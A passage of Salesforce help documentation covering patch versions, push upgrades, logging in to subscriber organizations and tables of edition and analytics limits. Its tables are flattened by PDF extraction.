Development in a patch development organization is restricted. The following is a list of caveats:

• New package components can’t be added.

• Existing package components can’t be deleted.

• API and dynamic Apex access controls can’t change for the package.

• No deprecation of any Apex code.

• No new Apex class relationships, such as extends, can be added.

• No new Apex access modifiers, such as virtual or global, can be added.

• No new Web services can be added.

• No new feature dependencies can be added.

When you finish developing your patch, in your patch development organization:

1. Click Create > Packages and click the name of the package.
2. On the Upload Package page, click Upload.
3. Enter a Version Name. As a best practice, it's useful to have a short description and the date.
4. Notice that the Version Number has had its patchNumber incremented.
5. For managed packages, select a Release Type:

• Choose Managed - Released to upload an upgradeable version. After upload, some attributes of Salesforce components
are locked. For a list of locked attributes, see Developing Packages for Distribution.

• Choose Managed - Beta if you want to upload a version of your package to a small sampling of your audience for testing
purposes. You'll still be able to change the components and upload additional beta versions. For information on beta
versions, see Developing Packages for Distribution.

Note:  Beta packages can only be installed in Developer Edition or sandbox organizations, and thus can't be
pushed to customer organizations.

6. Change the Description, if necessary.
7. Optionally, enter and confirm a password to share the package privately with anyone who has the password. Don't enter

a password if you want to make the package available to anyone on AppExchange and share your package publicly.
8. Salesforce automatically selects the requirements it finds. In addition, select any other required components from the

Package Requirements and Object Requirements sections to notify installers of any requirements for this package.
9. Click Upload.

To distribute your patch, you can either share the upload link, or schedule a push upgrade.

See Also:
Scheduling Push Upgrades
Viewing Push Upgrade History
Preparing Your Apps for Distribution
Managing Versions
Publishing Upgrades to Managed Packages
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Scheduling Push Upgrades
Available in: Developer Edition

User Permissions Needed

“Upload AppExchange Packages”To push an upgrade:

Note:  Patch versions and push upgrades are only available to Salesforce ISV partners.

After you’ve created a patch version of your package, you can automatically deploy it to customers using a push upgrade.

Tip: Salesforce.com strongly recommends following this sequence for pushing package upgrades.

1. Push the upgrade to your own organizations so you can run tests and fix any bugs before upgrading subscribers.
2. When you’re ready and have coordinated with your customers on their change management process, push to a

small number of customer organizations. Try sandbox organizations first, if possible.
3. Once you’re comfortable with the initial results, push to your wider customer base, based on your agreements with

each customer.
4. Deprecate the previous version of your package in your main development organization. Replace the version on

AppExchange if necessary, and update your Trialforce setup.
5. If your upgrade was a patch, after you’ve successfully distributed the upgrade to subscriber organizations, reintegrate

those changes into your main development organization. For more information about combining patches into the
main development organization, see “Working with Patch Versions” in the ISVforce Guide.

For more information, see Best Practices for Push Upgrades and Patch Versions on page 3887.

To schedule a push upgrade:

1. Log in to your main development organization.
2. From Setup, click Create > Packages and click the name of the managed package whose upgrade you want to push. On

the package detail page, click the Versions tab, and then click Push Upgrades.
3. Click Schedule Push Upgrades.
4. Select a package version to push from the Patch Version drop-down list.

Note:  Beta versions aren’t eligible for push.

5. Enter a Scheduled Start Date, indicating when a push upgrade should begin.
6. In the Select Target Organizations section, select the organizations to receive your push upgrade. If an organization already

received a push upgrade for the selected package version, it won’t appear in this list. You can select organizations by:

• Entering a term that filters based on an organization’s name or ID. Names can match by partial string, but IDs must
match exactly.

• Choosing between production and sandbox organizations from the Organizations drop-down list.

3882

Scheduling Push UpgradesDistributing Your Apps

http://sites.force.com/partners/PP2Page?p=P_PartnerPrograms
http://wiki.developerforce.com/index.php/Trialforce
http://na1.salesforce.com/help/doc/en/salesforce_packaging_guide.pdf


• Choosing organizations that have already installed a particular version.
• Clicking on individual organizations, or the Select All and Deselect All checkboxes.

This section lists the following information about the organization (in alphabetical order):

DescriptionField

The current package version an organization has installed.Current Version

The ID that uniquely identifies the organization to
salesforce.com.

Organization ID

The name of the organization. Clicking this name shows
the upgrade history for the organization.

Organization Name

The name of the contact who installed the package.Primary Contact

7. Click Schedule.

While a push upgrade is in progress, you can click Abort to stop it.

On the previous push upgrades page, the Push Upgrade History table lists recently scheduled push upgrades for the package.

See Also:
Viewing Push Upgrade History
Best Practices for Push Upgrades and Patch Versions
Viewing Push Upgrade Details
Preparing Your Apps for Distribution
Managing Versions
Publishing Upgrades to Managed Packages

Viewing Push Upgrade History

Available in: Developer Edition

User Permissions Needed

“Upload AppExchange Packages”To view push upgrade history:

Note:  Patch versions and push upgrades are only available to Salesforce ISV partners.

To view the details of all push upgrades sent by your organization, from Setup, click Create > Packages, click the name of
the package you want to view, then click Push Upgrades.
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The Push Upgrade History page lists the status of all your pending and previous push upgrades. To filter your push upgrade
history:

1. Select a version number from the drop-down list. Not selecting any version is equivalent to selecting all of them.
2. Select one or more statuses from the Status list. Not selecting any status is equivalent to selecting all of them.
3. Click Apply to filter the list. Click Clear to remove all the filters.

The history displays the following information (in alphabetical order):

DescriptionColumn

While a push upgrade is in progress, you can click Abort to
stop it.

Action

The scheduled start date and time of the push upgrade.Start Date

The status of the push upgrade, whether scheduled, in
progress, completed, aborted, or completed with failures.

Status

The name of the organization the push upgrade went to. For
multiple organizations, this field only lists the first organization

Target

in the queue, followed by the number of the total selected
organizations. Clicking on this link provides you with more
information about the target push upgrade and each individual
organization.

The package version number that was pushed.Version

See Also:
Scheduling Push Upgrades
Viewing Push Upgrade Details
Viewing an Organization's Upgrade History
Viewing Push Upgrade Details
Preparing Your Apps for Distribution
Managing Versions
Publishing Upgrades to Managed Packages
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Viewing Push Upgrade Details

Available in: Developer Edition

User Permissions Needed

“Upload AppExchange Packages”To view push upgrade details:

Note:  Patch versions and push upgrades are only available to Salesforce ISV partners.

For information about a specific push upgrade that your organization sent, from Setup, click Create > Packages, click the
name of the package you want to view, then click Push Upgrades. Clicking on the name of a Target takes you to the Push
Upgrade Details page, which has information both for the push job and each organization that it was pushed to.

The Job Details section has the following information about the overall push upgrade (in alphabetical order):

DescriptionField

The date and time the push upgrade finished.End Date

Whether Apex test failures that may cause the installed
application not to function properly were ignored.

Ignore Apex Test Failures

The name of the user who initiated the push upgrade.Scheduled By

The scheduled start date and time of the push upgrade.Start Date

The status of the push upgrade, whether scheduled, in
progress, completed, aborted, or completed with failures.

Status

The package version number that was pushed.Version

In the Organizations section, you can get a list of all the organizations that received a push upgrade. You can filter organizations
by using the search box and entering a term that filters based on an organization’s name or ID. Names can match by partial
string, but IDs must match exactly. From the drop-down list, you can also filter based on the status of the push upgrade.

The list contains the following information specific to each organization (in alphabetical order):

DescriptionField

The amount of time the push upgrade took.Duration

Lists the type of failure that occurred (if any). If the push
upgrade did fail, a possible explanation is provided in the

Failure Type

collapsible section. If the push upgrade was unsuccessful, click
Retry to try it again.

The ID that uniquely identifies the organization to
salesforce.com.

Organization ID
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DescriptionField

The name of the organization. Clicking this name shows the
upgrade history for the organization.

Organization Name

The scheduled start date and time of the push upgrade.Start

The status of the push upgrade, whether scheduled, in
progress, completed, aborted, or completed with failures.

Status

See Also:
Viewing Push Upgrade History
Viewing Push Upgrade History
Scheduling Push Upgrades
Preparing Your Apps for Distribution
Managing Versions
Publishing Upgrades to Managed Packages

Viewing an Organization's Upgrade History

Available in: Developer Edition

User Permissions Needed

“Upload AppExchange Packages”To view push upgrade history:

Note:  Patch versions and push upgrades are only available to Salesforce ISV partners.

For more information about a specific organization that received a push upgrade, from Setup, click Create > Packages, click
the name of the package you want to view, then click on the name of a Target. Clicking on an organization in the target list
provides the following details (in alphabetical order):

DescriptionField

The current package version an organization has installed.Current Version

The ID that uniquely identifies the organization to
salesforce.com.

Organization ID

The name of the organization.Organization Name

The name of the contact who installed the package.Primary Contact

The email address of the package publisher.Primary Contact Email
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DescriptionField

The status of the push upgrade, whether scheduled, in
progress, completed, aborted, or completed with failures.

Status

The Push Upgrade History lists the following information (in alphabetical order):

DescriptionField

Clicking View Details returns you to the job details for that
upgrade.

Action

The scheduled start date and time of the push upgrade.Start Date

The status of the push upgrade, whether scheduled, in
progress, completed, aborted, or completed with failures.

Status

The package version number that was pushed.Version

See Also:
Viewing Push Upgrade History
Viewing Push Upgrade Details
Viewing Push Upgrade History
Creating and Uploading Patches
Scheduling Push Upgrades
Preparing Your Apps for Distribution
Managing Versions
Publishing Upgrades to Managed Packages

Best Practices for Push Upgrades and Patch Versions

Available in: Developer Edition

User Permissions Needed

“Upload AppExchange Packages”To push an upgrade or create a patch development
organization:

Note:  Patch versions and push upgrades are only available to Salesforce ISV partners.

Consider the following best practices when scheduling a push:
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• Schedule push upgrades at your customers’ off-peak hours and outside of salesforce.com's major release windows, to
minimize potential subscriber impact.

• Avoid changes to validation rules, formula fields, and errors thrown from Apex triggers, as they may negatively impact
subscribers’ integrations.

• Visualforce pages that are refreshed while a push upgrade is in process may lose their view state if the page or controller is
changed.

Consider the following additional best practice when creating a patch version:

• Visible changes to a package shouldn't be performed in a patch. Other than a change in the package version number,
subscribers aren't notified of push upgrades.

See Also:
Scheduling Push Upgrades

Publishing Packages FAQ
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

• How are packages ranked?

• What types of things can I publish?

See Also:
How are packages ranked?
What types of things can I publish?
Installing Packages FAQ

How are packages ranked?
AppExchange lists feedback and ratings similar to those found on most consumer Internet sites. This gives the power to the
Salesforce user community to determine how useful a package is.

See Also:
Publishing Packages FAQ

What types of things can I publish?
You can publish any collection of components, such as tabs, reports, and dashboards that together address a specific business
need. You can bundle these components into a package to publish them together. For a list of components you can include
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in a package, see the Force.com Quick Reference for Developing Packages. Regardless of what components you add to your
package, your data is never included.

See Also:
Publishing Packages FAQ

SUPPORTING SUBSCRIBERS OF YOUR APP

Supporting Your Subscribers
App publishers are responsible for end user support of all their listings. When customers contact salesforce.com Customer
Support with a question about your listing, we direct the user to the support information on the About and Support tabs of
your listing. Make sure your AppExchange listings include support information.

If you have installed the License Management App (LMA), you can log into a customer's organization and provide administrative
support for your customers. This feature is only available for managed packages that have passed the security review. For more
information, see Logging in to Subscriber Organizations.

Subscriber Organizations
User Permissions Needed

“Log in to Subscriber Organization”To log in to subscriber organizations:

This page shows a list of subscriber organizations with your package installed. To find a subscriber organization quickly, enter
a subscriber name or organization ID in the search box and click Search. Click the name of a subscriber organization to view
detailed information about it.

Note:  Only subscribers who have installed at least one managed package that is linked to your LMA will appear in
this list.

Viewing Subscriber Details
User Permissions Needed

“Log in to Subscriber Organization”To log in to subscriber organizations:

The Subscriber Overview page, accessed by clicking the organization’s name from the Subscribers tab of the LMA, provides
detailed information about each subscriber organization. This can give you insight into how a customer is using your app and
help you in troubleshooting problems.
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Under Organization Details:

• The name and contact information is in Setup, on the Company Profile > Company Information page in the subscriber’s
organization. This may differ from the information shown in your LMA lead, account, or contact records.

• Organization ID is a unique ID that identifies this customer’s Salesforce organization.

• Instance determines which salesforce.com data center this customer’s organization resides in. It also determines when the
customer will get upgraded with a new version of Salesforce. See trust.salesforce.com during the release period to understand
which version of Salesforce the customer is using.

The page also includes these related lists.

Best Practices
• When you access a subscriber organization, you are logged out of your LMO (License Management Organization). You

can set up a my domain so that you are not automatically logged out of your LMO when you log into a subscriber
organization. To set up a my domain, from Setup, click Company Profile > My Domain.

• Be careful to allow only trusted support and engineering personnel to log into a subscriber’s organization. Since this feature
may include full read/write access to customer data and configurations, it’s vital to your reputation to preserve their security.

• Control who has access by giving the “Log in to Subscriber Organization” user permission to specific support personnel,
via a profile or permission set.

Requesting Login Access
Ask the user to go to their personal settings and click Grant Account Login Access or Grant Login Access, whichever appears,
to grant access. If the publisher isn’t listed on this page, it’s for one of the following reasons:

• A system administrator disabled the ability for non-administrators to grant access.

• The user doesn’t have a license for the package.

• The package is licensed to the entire organization. Only administrators with the “Manage Users” permission enabled on
their profile can grant access.

• The organization preference Administrators Can Log in as Any User is enabled.

Note:  Unless the organization preference Administrators Can Log in as Any User is enabled, access is granted for
a limited amount of time, and the subscriber can revoke access at any time. Any changes you make while logged in
as a subscriber are logged in the audit trail.

Logging in to Subscriber Organizations
User Permissions Needed

“Log in to Subscriber Organization”To log in to subscriber organizations:

To log in, once a user has granted you access:
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1. In the License Management App (LMA), click the Subscribers tab.
2. To find a subscriber organization quickly, enter a subscriber name or organization ID in the search box and click Search.
3. Click the name of the subscriber organization.
4. On the Organization Details page, click Login next to a user's name. Note that you have the same permissions as the user

you logged in as.
5. When you’re finished troubleshooting, from Setup, click Return to Subscriber Overview to return to your organization.

Note:  Only subscribers who have installed at least one managed package that is linked to your LMA will appear in
this list.

Best Practices
• When you access a subscriber organization, you are logged out of your LMO (License Management Organization). You

can set up a my domain so that you are not automatically logged out of your LMO when you log into a subscriber
organization. To set up a my domain, from Setup, click Company Profile > My Domain.

• Be careful to allow only trusted support and engineering personnel to log into a subscriber’s organization. Since this feature
may include full read/write access to customer data and configurations, it’s vital to your reputation to preserve their security.

• Control who has access by giving the “Log in to Subscriber Organization” user permission to specific support personnel,
via a profile or permission set.

Troubleshooting in Subscriber Organizations
When logged in as a user in a subscriber’s organization, you can generate Apex debug logs that contain the output from your
managed packages.  This includes logging that would normally not be exposed to the subscriber.  Using this log information,
you can troubleshoot issues that are specific to that subscriber organization. 

1. Launch the Developer Console from Your Name > Developer Console.
2. Perform the operation and view the debug log with your output. If the user has access, set up a Debug Log: from Setup,

click Monitoring > Debug Logs or Logs > Debug Logs.

Note that subscribers will be unable to see the logs you set up or generate since they contain your Apex code unobfuscated.
In addition, you can also view and edit data contained in protected custom settings from your managed packages when logged
in as a user.  
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Welcome Salesforce Users!
Salesforce Limits is a reference guide that covers a variety of limits associated with Salesforce features and products. However,
Salesforce Limits doesn’t cover all limits and some limits may not apply to your organization. Keep in mind that stated limits
aren’t a guarantee that the specified resource is available at its limit in all circumstances. For example, some limits depend on
load, performance, and other system issues. In addition, Salesforce Limits doesn't include limits of:

• User interface elements in the Salesforce application

• Field lengths of Salesforce objects

• Desktop integration clients

All limits are subject to change at any time. Contact salesforce.com for more information.

See Also:
Salesforce Features and Edition Limits
Analytics Limits - All Editions
General Chatter Limits
General Email Limits

GENERAL SALESFORCE LIMITS

Salesforce Features and Edition Limits
Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

757575N/AN/AN/AN/AAction Plans: Maximum
Number of Tasks

5 per object5 per object5 per object5 per object5 per object5 per object5 per objectActive Lookup Filters

100 per
object

500 per
object

100 per
object

20 per object20 per
object

20 per
object

N/AActive Validation Rules

5 MB for
file

5 MB for
file

5 MB for
file

5 MB for
file

5 MB for
file

5 MB for
file

N/AAttachments: Maximum
Size of Attachment in the

attachments.attachments.attachments.attachments.attachments.attachments.

SALESFORCE LIMITS
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

2 GB for
feed
attachments.

Notes & Attachments
Related List1

2 GB for
feed
attachments.

2 GB for
feed
attachments.

2 GB for
feed
attachments.

2 GB for
feed
attachments.

2 GB for
feed
attachments.

100
categories in

100
categories in

100
categories in

N/AN/AN/AN/ACategories: Maximum
Default Number of

a dataa dataa dataCategories and Hierarchy
Levels category

group and 5
category
group and 5

category
group and 5

levels in alevels in alevels in a
datadatadata
categorycategorycategory
group
hierarchy

group
hierarchy

group
hierarchy

5 category
groups and

5 category
groups and

5 category
groups and

N/AN/AN/AN/ACategory Groups:
Maximum Default

3 active3 active3 activeNumber of Category
Groups category

groups
category
groups

category
groups

505050N/AN/AN/AN/ACertificates: Maximum
Number of Certificates

1 GB1 GB1 GB1 GB1 GB1 GB1 GBContent Deliveries:
Default Delivery
Bandwidth per Rolling
24-hour Window

20,00020,00020,00020,00020,00020,00020,000Content Deliveries:
Default Delivery View
Counts per Rolling
24-hour Window

25 MB25 MB25 MB25 MB25 MB25 MB25 MBContent Deliveries:
Maximum File Size for
Online Viewing

For all editions:Content: Maximum File
Size

• 2 GB

• 10 MB for Google Docs

• 38 MB when uploaded via the API

• 10 MB when uploaded via Visualforce

2,0002,0002,0002,0002,0002,0002,000Content: Maximum
Number of Libraries
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

500,000500,000500,000500,000500,000500,000500,000Content: Maximum
Number of Content
Documents

2,5005,0005,0005,0005,0005,0005,000Content: Maximum
Number of Content
Documents and Versions
in a 24–hour Period
(Adjustable)

505050505050N/AContent Packs: Maximum
Number of Files

10Unlimited10511N/ACustom Apps

(The custom apps
contained in a managed
package publicly posted on
the AppExchange don't
count against the limits for
your Salesforce Edition.)

500 per
object

800 per
object

500 per
object

100 per
object

100 per
object

25 per
object

5 per objectCustom Fields

(Additional restrictions
apply for activities, long
text area fields,
relationship fields, and
roll-up summary fields..)

5,0005,0005,0005,000N/AN/AN/ACustom Labels

1,024
characters

1,024
characters

1,024
characters

1,024
characters

1,024
characters

1,024
characters

1,024
characters

Custom Links: Maximum
Length of Link Label

3,000 bytes23,000 bytes23,000 bytes23,000 bytes23,000 bytes23,000 bytes23,000 bytes2Custom Links: Maximum
Length of Link URL

4002,00020050505N/ACustom Objects

(The custom objects
contained in a managed
package publicly posted on
the AppExchange don't
count against the limits for
your Salesforce Edition.)

Note: If you’re
approaching your
limit for custom
objects and need
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

to delete some,
you need to hard
delete or erase
them.
Soft-deleted
custom objects
and their data
count against
your limits.

232323232323N/ACustom Objects:
Maximum Number of
Master-Detail
Relationships

In a many-to-many relationship, a user can’t delete a parent record if more than
200 junction object records are associated with it and if the junction object has a
roll-up summary field that rolls up to the other parent.

N/ACustom Objects: Deletion
of Parent Records in a
Many-to-Many
Relationship

The lesser of
10 MB or 1

The lesser of
10 MB or 1

The lesser of
10 MB or 1

N/AThe lesser of
10 MB or 1

N/AThe lesser of
10 MB or 1

Custom Settings: Cached
Data Limit

MBMBMBMBMB
multipliedmultipliedmultipliedmultipliedmultiplied
by theby theby theby theby the
number ofnumber ofnumber ofnumber ofnumber of
full-featuredfull-featuredfull-featuredfull-featuredfull-featured
user licensesuser licensesuser licensesuser licensesuser licenses
in your
organization

in your
organization

in your
organization

in your
organization

in your
organization

300300300N/A300N/A300Custom Settings:
Maximum Number of
Fields Per Custom Setting

N/A100100100N/AN/AN/ADivisions: Maximum
Number of Divisions

20 KB20 KB20 KB20 KB20 KB20 KB20 KBDocuments: Maximum
Size of Custom App Logo

5 MB5 MB5 MB5 MB5 MB5 MB5 MBDocuments: Maximum
Size of Document to
Upload

255
characters

255
characters

255
characters

255
characters

255
characters

255
characters

255
characters

Documents: Maximum
File Name Size (Including
File Extension Name)
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

For Enterprise, Developer, and
Unlimited Editions, you can have:

N/AN/AN/AN/AEntitlement Processes and
Milestones

• 20 Entitlement processes

• 10 Milestones for each entitlement
process

Contact salesforce.com for information
on increasing the number of entitlement
processes and milestones.

202020202020N/AField History Tracking:
Maximum Number of
Standard or Custom Fields
Tracked for Standard or
Custom Objects

2 GB2 GB2 GB2 GB2 GB2 GB2 GBFiles: Maximum File Size
in Chatter and on the Files
Tab

250250250250250250250250Fiscal Years: Maximum
Number of Custom Fiscal
Years

3,900
characters

3,900
characters

3,900
characters

3,900
characters

3,900
characters

3,900
characters

3,900
characters

Formulas: Maximum
Number of Characters

1,300
characters

1,300
characters

1,300
characters

1,300
characters

1,300
characters

1,300
characters

1,300
characters

Formulas: Maximum
Number of Displayed
Characters After an
Evaluation of a Formula
Expression

4,000 bytes4,000 bytes4,000 bytes4,000 bytes4,000 bytes4,000 bytes4,000 bytesFormulas: Maximum
Formula Size (in Bytes)
When Saved

5,000 bytes5,000 bytes5,000 bytes5,000 bytes5,000 bytes5,000 bytes5,000 bytesFormulas: Maximum
Formula Size (in Bytes)
When Compiled

10101010101010Formulas: Number of
Unique Relationships Per
Object

10 per
object

10 per
object

10 per
object

10 per object10 per
object

10 per
object

10 per
object

Formulas: VLOOKUP
Functions

32 KB32 KB32 KB32 KBN/AN/AN/AIdeas: Maximum Size of
HTML Idea Description
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

4 KB4 KB4 KB4 KBN/AN/AN/AIdeas: Maximum Size of
HTML Idea Comment

10,000410,000410,000410,000410,000410,000410,0004Master-Detail
Relationship: Maximum
Number of Child Records

100,000100,000100,000100,000100,000100,000100,000Objects: Maximum
Number of Deleting
Combined Objects and
Child Records

1,0001,0001,000N/AN/AN/AN/APermission sets

N/A1,0001,000N/AN/AN/AN/AQuestion: Maximum
Number of Characters

N/A32,00032,000N/AN/AN/AN/AQuestion: Maximum
Number of Characters
(with Chatter Answers
Optimize Question
Flow enabled)

5 MB5 MB5 MB5 MBN/AN/AN/AQuote PDF: Maximum
Logo Size

150 pixels150 pixels150 pixels150 pixelsN/AN/AN/AQuote PDF: Maximum
Logo Height

25 times
your storage

25 times
your storage

25 times
your storage

25 times
your storage

25 times
your storage

25 times
your storage

25 times
your storage

Recycle Bin: Maximum
Number of Records

capacity in
MBs

capacity in
MBs

capacity in
MBs

capacity in
MBs

capacity in
MBs

capacity in
MBs

capacity in
MBs

N/A1,0001,000N/AN/AN/AN/AReply : Maximum Number
of Characters

N/A4,0004,000N/AN/AN/AN/AReply (Private): Maximum
Number of Characters
(with Chatter Answers
Optimize Question
Flow enabled)

N/A32,00032,000N/AN/AN/AN/AReplies (Public):
Maximum Number of
Characters (with Chatter
Answers Optimize
Question Flow enabled)

For all editions: If your organization has enabled Shared Activities, you can relate as many as 50
contacts to non-recurring and non-group tasks, and non-recurring events. You assign one primary
contact; all others are secondary contacts.

Shared Activities
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

For Professional, Enterprise, Unlimited, and Developer
Editions, administrators can create up to 300 sharing
rules per object, including up to 50 criteria-based rules.

N/AN/AN/ASharing Rules

A single
static

A single
static

A single
static

A single
static

A single
static

A single
static

N/AStatic Resources

resource canresource canresource canresource canresource canresource can
be up to 5
MB in size.

An
organization

be up to 5
MB in size.

An
organization

be up to 5
MB in size.

An
organization

be up to 5
MB in size.

An
organization

be up to 5
MB in size.

An
organization

be up to 5
MB in size.

An
organization

can have upcan have upcan have upcan have upcan have upcan have up
to 250 MBto 250 MBto 250 MBto 250 MBto 250 MBto 250 MB
of staticof staticof staticof staticof staticof static
resources,
total.

resources,
total.

resources,
total.

resources,
total.

resources,
total.

resources,
total.

100Unlimited251053N/ATabs

(The custom tabs
contained in a managed
package publicly posted on
the AppExchange don't
count against the limits for
your Salesforce Edition.)

For all editions, a user is limited to a maximum of:Tags

• 500 unique personal tags

• 5,000 instances of personal tags applied to records

Across all users, your organization can have a maximum of:

• 1,000 unique public tags

• 50,000 instances of public tags applied to records

• 5,000,000 instances of personal and public tags applied to records

151515N/AN/AN/AN/ATerritories: Maximum
Number of Account
Assignment Rules

2

5000
Chatter Free

Unlimited

5000
Chatter Free

Unlimited

5000
Chatter Free

Unlimited

5000
Chatter Free

10

5000
Chatter Free

5

5000
Chatter Free

1Users: Maximum Number
of Users Created
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

For Enterprise, Developer, and
Unlimited Editions, each flow can have
up to:

N/AN/AN/AN/AVisual Workflow

• 50 versions

• 2000 steps

Each organization can have up to:

• 500 active flows

• 1000 flows total

5,00055,00055,00055,0005N/AN/AN/AWeb-to-Case: Maximum
Number of New Cases
Generated in a 24–hour
Period

5005500550055005N/AN/AN/AWeb-to-Lead: Maximum
Number of New Leads
Generated in a 24–hour
Period

1 You can add an attachment to the Attachments related list of a case, solution, campaign, task, or event, or to the Notes and
Attachments related list of an account, contact, lead, opportunity, or custom object. If you don't see the related list on task or
event page layouts, you may need to ask your administrator to add it. All file types are supported, including everything from
Microsoft® PowerPoint presentations and Excel spreadsheets, to Adobe® PDFs, image files, audio files, and video files.
2 When data is substituted for the tokens in the URL, the link may exceed 3,000 bytes. Your browser may enforce additional
limits for the maximum URL length.
3 Each relationship is included in the maximum number of custom fields allowed.
4 As a best practice, don't exceed 10,000 child records for a master-detail relationship.
5 If your organization exceeds its daily Web-to-Case or Web-to-Lead limit, the default case owner or default lead creator
receives a notification email containing information about the case or lead. When your organization reaches the 24–hour limit,
salesforce.com stores additional requests in a pending request queue that contains both Web-to-Case and Web-to-Lead
requests. The requests are submitted when the limit refreshes. The pending request queue has a limit of 50,000 combined
requests. If your organization reaches the pending request limit, additional requests are rejected and not queued. Your
administrator receives email notifications for the first five rejected submissions. Contact salesforce.com Customer Support to
change your organization's pending request limit.

See Also:
Accessibility Limits
Inline Editing Limits
Analytics Limits Per Edition
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Accessibility Limits
Salesforce on-demand applications incorporate a number of accessibility features that ensure all users have access and can use
the applications. Many of the features are provided in Accessibility Mode, which can be enabled on an individual user basis.

The following sections describe limits that apply to accessibility features.

General Accessibility Limits
Accessibility features haven’t been incorporated into Chatter or the Service Cloud console.

Salesforce.com Features Not Optimized for Sighted Keyboard Users
The following functionality and features aren't fully accessible for sighted keyboard users, either due to their third-party
ownership, lack of adequate current support for accessibility solutions, or limitations imposed by our development environments:

• A visual focus indicator hasn't been implemented.
• Some content is displayed in overlay boxes without implementing corresponding keyboard focus and order control. These

are found in Chatter and training videos.
• Some of the rich interactive interfaces, such as drag-and-drop interfaces, aren't keyboard-accessible. These may have an

alternative provided or may not be available in Accessibility Mode.

Salesforce.com Features Not Optimized for Screen Reader Users
The following functionality and features aren't fully accessible for screen reader users, either due to their third party ownership,
lack of adequate current support for accessibility solutions, or limitations imposed by our development environments:

• Some of the rich interactive interfaces, such as drag and drop interfaces, are not accessible. These may have an alternative
provided or may not be available in Accessibility Mode.

• PDF files have not been marked up for accessibility and do not have an alternative provided.
• Training videos don't provide audio description (including extended audio description).
• Some content is displayed in overlay boxes that aren't recognized as modal by screen readers, allowing the user to interact

with other content without dismissing the overlay. These are found in Chatter and training videos.
• The session timeout warning may not provide sufficient time for a user response if a slow reading rate is used.

Accessibility features haven’t been incorporated into Chatter or the Service Cloud console.
DRC 184.12

Inline Editing Limits
Inline editing lets users quickly edit field values on a record’s detail page.

The following limits apply to the inline editing feature.

• Inline editing isn’t available in:

◊ Accessibility mode
◊ Setup pages
◊ Dashboards
◊ Customer Portal
◊ Descriptions for HTML solutions
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• The following standard checkboxes on case and lead edit pages are not inline editable:

◊ Case Assignment (Assign using active assignment rules)
◊ Case Email Notification (Send notification email to contact)
◊ Lead Assignment (Assign using active assignment rule)

• The fields in the following standard objects are not inline editable.

◊ All fields in Documents and Pricebooks
◊ All fields in Tasks except for Subject and Comment
◊ All fields in Events except for Subject, Description, and Location
◊ Full name fields of Person Accounts, Contacts, and Leads. However, their component fields are, for example, First

Name and Last Name.

• You can use inline editing to change the values of fields on records for which you have read-only access, either via field-level
security or your organization's sharing model; however, Salesforce doesn't let you save your changes, and displays an
insufficient privileges error message when you try to save the record.

About the Standard Object Limits Page
Available in: All Editions except Database.com

The standard object limits page shows details about your usage of customizations on an object, such as the custom fields you’ve
added or sharing rules you’ve applied. The items in the list vary depending on the object. When an item exceeds the limit
allowed for the object, or reaches 75% of the limit, a tip displays that suggests what you can do next.

You can refer to the standard object limits page when planning how you want to customize a particular standard object, or to
monitor the usage and limits of customizations on that object.

To access the standard object limits page, from Setup, click Customize, click the name of the desired standard object, then
click the limits option for that object.

Note:  The object limit percentages displayed for items used are truncated, not rounded. For example, if your
organization uses 95.55% of the limit for a particular item, the percentage displayed is 95%.

ANALYTICS LIMITS

Analytics Limits Per Edition
Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

20202020202020Field Filters per Report1
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

5555555Formulas per Report

One per
hour2

Two per
hour2

One per
hour2

One per
hour2

(off-peak
hours only3)

(Limited to
three

N/AN/AN/AScheduled Reports

(Emailed reports can be up
to 10 MB.) (off-peak

hours only3)

(Limited to
three

preferred preferred
start times, start times,
which can't
be changed)

which can't
be changed)

3333N/AN/AN/AFiltered Dashboards

Up to three
per
organization

Up to 10 per
organization

Up to five
per
organization

N/AN/AN/AN/ADynamic Dashboards

N/ATwo per
hour2

One per
hour2

N/AN/AN/AN/AScheduled Dashboard
Refreshes

4002,00020050N/AN/AN/ACustom Report Types

(Limits apply to all custom
report types regardless of
development status.)

One per
hour2

Two per
hour2

One per
hour2

One per
hour2

(off-peak
hours only3)

(Limited to
one

N/AN/AN/AAnalytic Snapshots

(off-peak
hours only3)

(Limited to
one

preferred preferred
start time start time
per day, per day,
which can't
be changed)

which can't
be changed)

1 These limits apply to the report builder. If you’re using the report wizard, the limit is 10.
2 Up to a possible maximum of 200, total.
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3 Off-peak hours are between 6 PM and 3 AM local time.

See Also:
Analytics Limits - All Editions
Salesforce Features and Edition Limits

Analytics Limits - All Editions
The following analytics limits apply to all supported editions.

Report Limits

• The report builder preview shows a maximum of 20 rows for summary and matrix reports, and 50 rows for tabular.

• You can't have more than 250 groups or 4,000 values in a chart. If you see an error message saying that your chart
has too many groups or values to plot, adjust the report filters to reduce the number. In combination charts, all groups
and values count against the total.

• Reports display a maximum of 2,000 rows. To view all the rows, export the report to Excel or use the printable view
for tabular and summary reports. For joined reports, export is not available, and the printable view displays a maximum
of 20,000 rows.

◊ Summary and matrix reports display the first 2,000 groupings when Show Details is disabled.

◊ Matrix reports display a maximum of 400,000 summarized values.

◊ Matrix reports display a maximum of 2,000 groupings in the vertical axis when Show Details is disabled. If there
are more than 400,000 summarized values, rows are removed until the 2,000 groupings limit is met, then columns
are removed until the number of summarized values moves below 400,000.

• By default, reports time out after 10 minutes. Contact salesforce.com to extend the time-out limit to 20 minutes for
tabular, summary, and matrix reports (joined reports will continue to time out after 10 minutes).

